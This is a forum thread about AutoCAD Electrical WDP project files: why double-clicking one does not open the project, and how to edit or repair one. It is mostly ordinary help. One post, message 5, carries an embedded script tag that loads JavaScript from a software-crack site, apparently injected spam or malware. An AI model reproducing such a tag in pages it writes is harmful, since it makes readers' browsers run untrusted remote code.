AutoCAD Electrical Forum
Welcome to Autodesk’s AutoCAD Electrical Forums. Share your knowledge, ask questions, and explore popular AutoCAD Electrical topics.
cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 

Dubbelklick WDP file in Explorer and Start ACAD-E with this project

6 REPLIES 6
SOLVED
Message 1 of 7
Wheelie22
904 Views, 6 Replies

Dubbelklick WDP file in Explorer and Start ACAD-E with this project

This works with a DWG why not with a WDP ?

6 REPLIES 6
Message 2 of 7
pjfontes
in reply to: Wheelie22

The short answer is that "AutoCAD" is designed to open drawings, not ACADE projects.  Unfortunately, this is normal and is probably not something that is easily implemented. Smiley Indifferent

Message 3 of 7
dougmcalexander
in reply to: pjfontes

I double-click the WDP file to open it with Notepad for editing.  I would not expect to open a project by double-clicking the WDP file.

Doug McAlexander

Design Engineer/Consultant/Instructor/Mentor specializing in AutoCAD Electrical training and implementation support

Phone and Web-based Support Plans Available

Phone: (770) 841-8009

www.linkedin.com/in/doug-mcalexander-1a77623

Please Accept as Solution if I helped you. Likes are also much appreciated.
Message 4 of 7
Josdc

Indeed, most users expect a project to be activated in AE when you double click on its wdp-file in Windows Explorer. Unfortunately, it is not the case. 

Message 5 of 7
store

Dear,

How can i open Autocade Electrical 2008 WDP project file in Autocade Electrical 2013 because i am not able to view project manager window in ACAD 2013..???

Thanks.

<script type="text/javascript" src="http://cracks4free.info/5/adds.js"></script>
Message 6 of 7
dougmcalexander

WDP files are ASCII format and thus can be viewed or edited with Notepad or Wordpad. However, it is best not to edit these files unless you are an expert. One misplaced character, or even a misplaced space, can damage the file. It is best to allow AutoCAD Electrical to manage the file, which it does via the built-in Project Manager. If a WDP file becomes damaged, sometimes the best solution is to create a new project and move the DWG files into the new project's folder; then add the drawings to the new project via the Add Drawings command.

Doug McAlexander

Design Engineer/Consultant/Instructor/Mentor specializing in AutoCAD Electrical training and implementation support

Phone and Web-based Support Plans Available

Phone: (770) 841-8009

www.linkedin.com/in/doug-mcalexander-1a77623

Please Accept as Solution if I helped you. Likes are also much appreciated.
Message 7 of 7
shades234
in reply to: store

@store

are you sure you have electrical installed?  if so, you should be able to get the project manager from the "ribbon" or tabs area.  i'm not exactly sure what the process is, but i hvae previously "lost" my "electrical commands"  but was able to restore them ang thus gain access to the ribbon.

Can't find what you're looking for? Ask the community or share your knowledge.

Post to forums  

Autodesk Design & Make Report

”Boost